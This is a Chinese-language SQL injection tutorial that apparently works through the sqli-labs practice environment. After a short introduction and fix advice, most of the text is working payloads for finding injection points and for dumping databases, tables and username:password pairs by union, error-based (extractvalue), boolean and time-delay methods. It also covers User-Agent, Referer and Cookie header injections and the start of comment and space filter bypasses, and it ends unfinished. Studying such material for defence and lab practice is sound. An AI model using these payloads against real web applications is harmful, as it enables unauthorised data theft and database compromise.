目录:
一、SQL注入漏洞介绍
二、修复建议
三、通用姿势
四、具体实例
五、各种绕过
一、SQL注入漏洞介绍:
SQL注入攻击包括通过输入数据从客户端插入或“注入”SQL查询到应用程序。一个成功的SQL注入攻击可以从数据库中获取敏感数据、修改数据库数据(插入/更新/删除)、执行数据库管理操作(如关闭数据库管理系统)、恢复存在于数据库文件系统中的指定文件内容,在某些情况下能对操作系统发布命令。SQL注入攻击是一种注入攻击。它将SQL命令注入到数据层输入,从而影响执行预定义的SQL命令。由于用户的输入,也是SQL语句的一部分,所以攻击者可以利用这部分可以控制的内容,注入自己定义的语句,改变SQL语句执行逻辑,让数据库执行任意自己需要的指令。通过控制部分SQL语句,攻击者可以查询数据库中任何自己需要的数据,利用数据库的一些特性,可以直接获取数据库服务器的系统权限。
二、修复建议
- 使用参数化查询接口或在代码级对带入SQL语句中的外部参数进行转义或过滤;
- 对于整数,判断变量是否符合[0-9]的值;其他限定值,也可以进行合法性校验;
- 对于字符串,对SQL语句特殊字符进行转义(单引号转成两个单引号,双引号转成两个双引号)。
三、通用姿势
3.1 通过以下操作先大概判断是否存在注入点
- 如果参数(id)是数字,测试id=2-1与id=1返回的结果是否相同,如果做了2-1=1的运算,说明可能存在数字型注入。如果要用+号运算的话,因为URL编码的问题,需要把加好换成%2B,如id=1%2B1
- 在参数后面加单引号或双引号,判断返回结果是否有报错
- 添加注释符,判断前后是否有报错,如id=1\' --+ 或 id=1" --+ 或id=1\' # 或id=1" --+ (--后面跟+号,是把+当成空格使用)
- 有些参数可能在括号里面,如:SELECT first_name, last_name FROM users WHERE user_id = (\'$id\');所以也可以在参数后面加单双引号和括号,如id=1\') --+ 或 id=1") --+ 或id=1\') # 或id=1") --+
- 参数后面跟or 或者and,判断返回结果是否有变化,如1\' or \'a\'=\'a 或者and \'a\'=\'a或者1\' or \'a\'=\'b或者1\' or \'1\'=\'2
- 如果返回的正确页面与错误页面都一样,可以考虑时间延迟的方法判断是否存在注入,如 1’ and sleep(5)
3.2 如果存在注入,利用注入获取信息
3.2.1 查询结果如果可以直接返回
利用联合查询一步步的获取信息,如:
// 获取数据库名称,注意联合查询要求前后查询的列数和数据类型必须对应
1\' union select schema_name ,1 from information_schema.schemata --
//根据上一步获取的数据库名称,获取表名
1\' union select table_name from information_schema.tables where table_schema=\'database_name\'
//根据上面的数据库名称和表名获取字段名
1\' union select column_name from information_schema.columns where table_schema=\'database_name\' and table_name=\'table_name\'
//获取字段值,使用group_concat的目的是把查询结果合并成1列,另外,如果跨数据库查询值得花,需要使用数据库名.表明的格式,比如information_schema.schemata
1′ union select group_concat(user_id,first_name,last_name),group_concat(password) from 数据库名.表名
3.2.2 通过报错回显查询结果,如:
#利用报错回显查询到的值,回显当前的数据库名
and extractvalue(1,concat(0x7e,(select database())))
#回显表名
and extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=\'security\' )))
#回显列名
and extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema=\'security\' and table_name=\'users\')))
3.2.3 布尔型注入,如:
#判断数据库名的长度是多少 SELECT * FROM users where id =\'1\' and LENGTH(database())=8 # 二分查找发挨个判断数据库名称的每个字母 SELECT * FROM users where id =\'1\' and ascii(substr((select database()),1,1))>115 #挨个判断此数据库中表的每个字母 SELECT * FROM users where id =\'1\' and ascii(substr((select table_name from information_schema.tables where table_schema=\'security\' limit 3,1),1,1))>116
3.2.4 时间延迟注入,如:
and IF(ascii(substr((select database()),1,1))>115,1,sleep(5))
四、具体实例
4.1 字符型(参数在单引号内,直接返回结果)
步骤1:参数后面加一个单引号报SQL错误
分析:单引号报错,所以参数在两个单引号里面,通过闭合单引号、联合查询直接查询到数据库数据
步骤2:构造payload
id=0\' union select NULL,database(),NULL --+ #查询当前数据库的名称
#爆库名
id=0\' union select null,group_concat(schema_name),null from information_schema.schemata --+
#爆表名
id=0\' union select null,group_concat(table_name),null from information_schema.tables where table_schema=\'security\' --+
#爆字段名
id=0\' union select null,group_concat(column_name),null from information_schema.columns where table_schema=\'security\' and table_name=\'users\' --+
#获取数据库中的数据
id=0\' union select null,group_concat(username,0x3a,password),null from security.users--+
4.2 数字型(直接返回结果)
步骤1:id=1与id=2-1返回相同结果,数字型注入
步骤2:构造payload
无需引号闭合,id后面直接跟联合索引就行了
#爆库名
4.3 字符型(参数在单引号和括号内、直接返回结果)
步骤1:输入单引号报错,根据报错可知参数在单引号和括号内
步骤2:闭合查询
用单引号、括号和注释闭合查询,payload: id=1\') --+
步骤3:各种爆,与上面的操作相同
4.4 布尔型(参数在单引内、不返回查询结果)
步骤1:输入单引号报错,根据报错得知参数在单引号内,构造id=1\' --+返回正确页面,确认存在注入
步骤2:查询结果不返回,根据id=1\' and 1=1 --+ 与 id=1\' and 1=2 --+返回结果不同,判断存在布尔型注入
步骤3:构造payload,先判断数据库名的长度,id=1\' \' and LENGTH(database())=8 --+ 值等于8的时候返回正确的页面,说明数据库长度为8
步骤4:通过二分查找法,挨个判断数据库名称的每个字母
id=1\' and ascii(substr((select database()),1,1))>110 --+ #判断第一个字母的ascii是否大于110,返回正确页面,说明大于110
id=1\' and ascii(substr((select database()),1,1))>118 --+ #判断第一个字母的ascii是否大于118,返回不正确页面,说明小与等于118
id=1\' and ascii(substr((select database()),1,1))>115 --+ #判断第一个字母的ascii是否大于115,返回不正确页面,说明小与等于115
id=1\' and ascii(substr((select database()),1,1))>113 --+ #判断第一个字母的ascii是否大于113,返回正确页面,说明大与113
id=1\' and ascii(substr((select database()),1,1))>114 --+ #判断第一个字母的ascii是否大于114,返回正确页面,说明大与114
大于114,小于等于115,第一个字母的ascii值肯定就是115了,所以第一个字母就是s,依次类推可以查到剩下的所有字母。
4.5 布尔型(参数在单引内和两个括号内、不返回查询结果)
步骤1:输入单引号报错,但没有详细的报错提示
步骤2:增加1个括号也报错,增加2个括号返回正确
步骤3:布尔型,不返回查询结果,payload与上面的相同。
4.6 时间延迟注入(无论查询是否正确都返回一样的页面)
步骤1:如论输入什么,都返回一样的页面,所以考虑时间延迟注入
步骤2:直接1 and sleep(5) --+ 没延迟,说明查询语句没有闭合成功
步骤3:猜测参数在单引号内,构造payload:id=1\' and sleep(5) --+ 页面相应延迟,存在注入
步骤4:构造payload,当数据库名长度为8的时候没有延迟,说明数据库名称的长度就是8
id=1\' AND IF(LENGTH(database())=8,1,sleep(10)) --+
步骤5:通过如下方式,挨个判断数据库名的字母
id=1\' and IF(ascii(substr((select database()),1,1))>115,1,sleep(5)) --+
4.7 字符型报错注入(错误值被返回)
步骤1:按下面的测试,username字段存在字符型注入,参数在单引号内
步骤2:username字段输入一些无关的东西,SQL报错详情被回显
步骤3:利用extractvalue函数,让执行的结果以报错的方式显示出来
extractvalue(目标xml文档,xml路径),第二个参数的格式是/xxx/xx/xx/xx,如果格式不正确就会把报错显示出来
构造payload:uname=admin\' and extractvalue(1,concat(0x7e,(select database())))--+
4.7 user-agent类型的注入
步骤1:user-agent的值被原封返回了
步骤2:这里需要借助源码审计了,否则不容易猜到真实的sql语句。
如下源码所示,SQL语句是三个字段的insert语句,然后$uagent被返回。
步骤3:结合报错注入,构造payload:
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0\', extractvalue(1,concat(0x7e,(select database()))),\'1\') #
4.8 Referer类型的注入
方法与上述相同,先闭合sql语句,然后利用报错返回,payload如下:
Referer: http://127.0.0.1/sql/Less-19/\',extractvalue(1,concat(0x7e,(select database()))))#
4.9 Cookie类型的注入
步骤1:输入单引号报错,确认属于cookie类型的注入,而且报错回显了,利用报错回显数据
步骤2:构造payload
Cookie: uname=admin\' and extractvalue(1,concat(0x7e,(select database()))) #
五、各种绕过
5.1 注释符被过滤(--、#)
方法1:union查询中多加一个单引号以便闭合sql语句,比如:
id=0\' union select null,database(),\'null id=0\' union select null,group_concat(schema_name),null from information_schema.schemata union select null,null,\'nul
5.2 空格被过滤
方法1:使用/**/注释符代替空格
未完待续……